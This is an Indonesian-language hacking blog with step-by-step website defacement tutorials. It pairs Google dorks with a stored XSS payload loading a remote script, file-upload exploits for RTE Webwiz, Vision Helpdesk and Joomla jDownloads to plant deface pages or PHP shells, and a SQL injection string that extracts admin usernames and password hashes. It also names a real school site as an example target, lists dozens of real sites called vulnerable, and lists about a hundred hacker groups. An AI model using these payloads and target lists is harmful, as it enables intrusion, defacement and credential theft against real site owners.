Senin, 03 Juli 2017

Deface teknik buku tamu

Bahan anu  :

1.Dork : "Inurl:/Bukutamu.html site:.th"

Kembangkan otak vokepers mu nak

2.Script JSO Nih"

<script type="text/javascript" src="http://atominik.com/T37"></script>"

Tinggal Edit

3.Bawa Enjoy Biar Otak FRESH  bebz :D
Step by Step nya nh bebz jngn shafao mulu lu simak:

1.Dork : "Inurl:/Bukutamu.html" ,

Contoh target

Target : http://www.smktarunabangsa.sch.id/bukutamu.html

2.Isi Kolom :Name = Isi bebas,
Email = Isi bebas,
Pesan Anda = Masukkan
Script JSO:

<script type="text/javascript" src="http://target.coli/T37"></script>

Masukkan Kode Vertifikasi

Klo vuln akan muncul script kalian tadi,

Tapi klo tidak vuln.. kurang tamvan berarti

tidak terjadi apa-apa :D bebz

Klo sudah tinggal upload mirror saja :) jangan lupa nitip nick ea :*😘😘😘😘

#WeAreNoobers
#IzinShareAdmin🙏🏻🙏🏻🙏🏻🙏🏻🙏🏻
#semogaBermanfaat

Nitip nick ya :Mr.Cakil,PROXY55

Diposting oleh di 1 komentar:

POC ? RTE Webwiz Vulnerability


POC ? RTE Webwiz Vulnerability

1.Buka google.com jngn shafao ya  dan tulis dork dibawah ini..."

inurl:rte/my_documents/my_files "

2.Lalu pilih salah satu website yang ingin lu deface.

3.Jika sudah, sekarang lu ubah URL lu jadi seperti di bawah...

site.coli/admin/RTE_popup_file_atch.asp "

4. Nah lu sudah menemukan letak file upload nya :) ,

sekarang upload deh file lu bebz !...

Sekarang liat di File URL. itu adalah bagian link yang sudah berisi file deface lu bebz. sekarang tinggal lu ubah deh  jadi begini=>

Contoh: site.coli/admin/my_documents/my_files/FileDefacemu.html

Sekian dan terima kasih:)

#SalamNoobersMin

Thx :MR.CAKIL

Diposting oleh di Tidak ada komentar:

Selasa, 27 Juni 2017

Deface teknik Vision Stabel Profil HELPDESK

Dork :intext:"Powered by vision Helpdesk"

inurl:"/index.php?/client/register

"(Kembangin lagi, gunakan imajinasi vokepers biar dapet yang vuln n verawan)

eXploit : target.com/[path]/index.php?/client/register

1. Dorking menggunakan Search Engine

2. Pilih target kalian, Lalu masukan eXploitnyee.contoh: target.c0li/index.php?/client/register

3. Vulnerability ~ Muncul Form RegisterKaloAccess Deniedikhlaskan dan Move On :p

4. Isi dah form registernya,, asal2an bae, sing pentingusernamedanpasswordnyajan asal2an.karena buat nantiLogin

5. Kalo register sukses muncul notif Successfully di page Login

6. Langsung login bae pake akun yg tadi dah lu register

7. Langsung klikProfile

8. dan KlikEdit Profile

9. Lalu Upload Script Deface kalian. Untuk upload script deface nya, Lu rename jadi script.jpg html juga bisa deh tergantung web  bebz, jadi gak perlu di tamper data .

10. Sukses kan upload Script Deface nya?

11. Untuk lihat script deface yang sudah di upload tadi, tinggalklik kanandi image nya, laluview image /open image in new tab.BooM ~Seruput Kopi ~

Diposting oleh di 1 komentar:

Minggu, 25 Juni 2017

Tutorial deface cms joomla dengan exploit jdownloads shell upload vulnerability

 Tutorial Deface CMS Joomla dengan eXploit Jdownloads Shell Upload Vulnerability .

Let's Play with me Baby ;*

Dork : intext:"Powered by jDownloads"

(gunakan imajinasi vokepers lu, biar dapet yg vuln n verawan)

eXploit :
/index.php?option=com_jdownloads&Itemid=1&view=upload
atau
/index.php?option=com_jdownloads&Itemid=1&task=upload

Script Deface dengan ekstensi deface.html.j, deface.txt.j atau yang mau upload Shell silahkan siapkan shell.php.php.j

1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.
cth: target.coli/index.php?option=com_jdownloads&Itemid=1&view=upload

3. Vulnerability ~ Muncul Formulir

4. Lalu isi data2 yang perlu tunjukkan imajinasi mu guys uploads script pepes mu atau shell kalian
contoh Gua upload file mamam.php.php.j

5. Kalo sukses nanti Muncul icon +berwarna Hijau.

6. File/Shell Akses: /images/jdownloads/screenshots/filelu.php.j

bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung 

Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek saya
Happy Joomla Hacked~
Sekian dan semoga bermanfaat .. terimakasih

Source and Thanks to: Idiot Attacker, TKJ Cyber art

Diposting oleh di 1 komentar:

Rabu, 21 Juni 2017

Kumpulan Web vuln

web vuln 2017

http://bestilling.utdanningsdirektoratet.no/
http://apbw.e-bestis.com.tw/
http://cht.e-bestis.com.tw/
http://tcc.e-bestis.com.tw/
http://doacoes.fussesp.sp.gov.br/
http://bestilling.udir.no/
http://www.567888.pw/
http://www.6y555.com/
http://www.sungod-lighting.com/
http://www.dgxwx.com/
http://www.yiduseiki.com/
http://hncjwy.com/
http://5.99.166.67/
http://apparelworld.org/
http://bico.ecampus.it/
http://fet.e-bestis.com.tw/
http://irfaspx.irfanmil.it/
http://hicmo.ecampus.it/
http://opale.ecampus.it/
http://silos.ecampus.it/
http://syscomresources.com.my/
http://www.danahias.at/
http://www.irfanmil.it/
http://tcc.e-bestis.com.tw/
http://www.gdmc-kwt.com/
http://qfirst.br.sgs.com/
http://www.ymcta.com/
http://ent.njtrh.org/
http://lcocyouth.candp-ent.com/
http://www.wsdscu.org/
http://www.e-doc.fte.kmutnb.ac.th/
http://wangshibee.com/
http://morganexport.com/
http://fwclass.com/
http://scm.icams.co.kr/
http://bestilling.udir.no/
http://158.36.153.158/
http://doacoes.fussesp.sp.gov.br/
http://apbw.e-bestis.com.tw/
http://asia.e-bestis.com.tw/
http://cht.e-bestis.com.tw/
http://fet.e-bestis.com.tw/
http://imode.e-bestis.com.tw/
http://tcc.e-bestis.com.tw/
http://bico.ecampus.it/
http://ciscos.ecampus.it/
http://hicmo.ecampus.it/
http://hicmoproject.it/
http://irfaspx.irfanmil.it/
http://opale.ecampus.it/
http://www.ecampus.it/
http://www.irfanmil.it/
http://www.dgxwx.com/
http://www.sungod-lighting.com/
http://158.36.153.158/
http://bestilling.udir.no/
http://www.dgxwx.com/
http://www.sungod-lighting.com/
http://www.yiduseiki.com/
http://doacoes.fussesp.sp.gov.br/

Diposting oleh di Tidak ada komentar:

Senin, 19 Juni 2017

Deface teknik Lokomedia

Dork :
inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html
Kembang pake otak bokep mulu guys lagi biar dapet yg VULN + Perawan :p :*
2. Exploit
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

3. MD5 Decrypter KHUSUS MD5 DECRYPTER, LU DECRYPT PAKE OTAKLU NDIRI! Bercanda :v
Ada tools online nya kok :p
https://hashkiller.co.uk/md5-decrypter.aspx
http://md5online.org
/Tutorial:
1. Dorking pake dork di atas.
2. Pilih salah satu target. Salah dua juga gapapa :v
3. Masukan injeksi nya.
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

Gatau caranya? :v Sini gua ajarin :p
http://site.co.li/statis-1-profil.html

Lu tambahin exploit nya sesudah angka. Jadinya gini:
http://site.co.li/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
4. Kalo vuln jadinya bakal ada tab selanjutnya bukan eror yak (hehe)
5. Tekan Ctrl+U trus copy MD5 nya ke MD5 Decrypter.
6. Tinggal cari admin page nya. Biasanya sih di
:http://target.co.li/admin
http://target.co.li/adminweb
http://target.co.li/administrator
http://target.co.li/redaktur
7. Tanem shell? Use ur brain :) Jangan maunya disuapin mulu!
8. Akses shell? Klik kanan gambar yg ancur. trus 'Copy Image Location'.
9. Jan lupa pasang nick gw di Script lu :v

Diposting oleh di Tidak ada komentar:

Daftar team cyber siap tempur

LIST GRUP CYBER INDONESIAN SIAP TEMPUR :
01.INDONESIA FIGHTER CYBER |
02.CyberSecurity Team |
03.Indonesian Hacking Groups |
04.IDCA | KRA-Coder |
05.GARUT BLACKHAT FIGHTER CYBER |
06.Badut-Team |
07.Indonesia Security Down |
08.Ofprogrammer Team |
09.PCC-Team |
10.The Cyber Heroez |
11.S.O.S malware ghost VPN |
12.Anonymous Cyber 04|
13.Gembel Black kracker's |
14.Cyber Brother |
15.Blackc0de |
16.SULSEL HACKER TEAM |
17.Hkc Team |
18.Keep_siL3nt Ternate Crew |
19.Amikom Cyber Team |
20.Bengkulu Hacker Team |
21.Palembang Hacker Link |
22.Cyber4rt |
23.Manusia Biasa Team |
24.Yogyakarta-CyberShadow |
25.Indonesian Hacker Team |
26.Hacker Indonesia |
27.Java Defacer Team |
28.207 Cyber Security|
29.Ravaz`CyberTeam|
30.Surabaya Blackhat |
31.Prabumulih Hacker Team |
32.Lampung black heart cyber |
33.Sund4nyM0uz Corporation |
34.Android Cyber Fighter |
35.Bekasi Cyber |
36.ISD | 37.SHRI |
38.Greget Hacking Team |
39.Team Sungai Raya Hacker |
40.HN Community | XCode |
41.JOKERHAT HACKERS |
42.Klaten Hacker Team |
43.Jogja Hacker Team |
44.Bandung Blackhat |
45.Zone-Injector |
46.DEFACE ZONE |
47.Malang Cyber Crew |
48.Hiddenymouz |
49.SULSEL HACKER TEAM |
50.$03B4NK Brother's |
51.Cyber R |P-H| T |
52.Indonesia Light Cyber |
53.Warcops Cyber Team |
54.PERAWANGCYBER |
56.Ahmed DeathRace Cyber |
57.New Team Cyber dan Attacker_404 Cyber
Team |
58.Greget Hacking Team |
59.Serdadu bayangan |
60.KayuagungCyberTeam |
61.Cyber Underground Activit, Minang_Cyber |
62.TKSI Black Team |
63.Makassar hacker team |
64.Palembang hecker |
65.Kukuruyuk dlooo om jihad
66.Anonymous | 67.Aceh Cyber Team |
68.Hacker Newbie |
69.Lampung Cyber Hacker Team |
70.Majalengka Cyber Hacker Team |
71.Suwong cyberteam premen |
72.Exploit UMMU Hacking |
73.Server Corporation Team |
74.Ravaz`CyberTean |
75.Anonymous 56 |
76.SAGA 5 FIGHTER CYBER |
77.Gembel Black krackker's |
78.Hidden School Hacker |
79.LastCyber Team |
80.Ariel Noah cyber team |
81.X-code |
82.Binus Hacker |
83.Devilzc0de |
84.IndoCyberMafia Sec |
85.Awesome Crew |
86.TNG cyber tangerang |
87.Hc-Crew |
88.SP Cyber Team |
89.Bekasi Cyber |
90.kecoa H4CK3R T34M |
91.Team Royale! |
92.Binhacker Tunggal Ika |
93.Ravaz' CyberTeam |
94.BAMBU RUNCING CYBER |
95.Hidden-Name Corp |
96.Muslim Muwahhid |
97.Anonymous Sixcents School |
98.Lampung Defacer Team |
99.IndonesianyMOuz Corporation |
100.JawaBarat Jihad Cyber |

Diposting oleh di Tidak ada komentar:
Langganan: Komentar (Atom)